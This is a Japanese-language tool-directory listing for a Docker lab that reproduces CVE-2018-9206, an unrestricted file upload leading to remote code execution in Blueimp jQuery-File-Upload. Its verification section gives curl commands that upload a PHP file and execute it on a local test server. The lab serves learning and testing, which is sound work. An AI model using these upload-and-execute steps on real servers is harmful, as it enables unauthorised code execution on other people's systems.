Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-9206-jquery-file-upload — Dockerベースのラボ環境。CVE-2018-9206(Blueimp jQuery-File-Uploadの制限なしファイルアップロードからRCEに至る脆弱性)を再現し、PoCスクリプトと検証コマンドを含む。 | Kitploit
ツール/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

Dockerベースのラボ環境。CVE-2018-9206(Blueimp jQuery-File-Uploadの制限なしファイルアップロードからRCEに至る脆弱性)を再現し、PoCスクリプトと検証コマンドを含む。

リポジトリを見る
118ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-9206 - Blueimp jQuery-File-Upload ラボ

CVE-2018-9206 の脆弱なDocker環境 - Blueimp jQuery-File-Upload <= 9.22.0 における無制限ファイルアップロード

クイックスタート

root@kitploit:~
docker compose up -d --build

アプリケーションは以下で利用可能: http://localhost:8888/jQuery-File-Upload/

検証

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

またはPoCスクリプトを実行:

root@kitploit:~
./scripts/poc.sh

クリーンアップ

root@kitploit:~
docker compose down -v

詳細

フィールド値
CVECVE-2018-9206
製品Blueimp jQuery-File-Upload
バージョン9.22.0
タイプ無制限ファイルアップロード → RCE
CVSS9.8 (重要)

参考リンク

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
ツールをダウンロード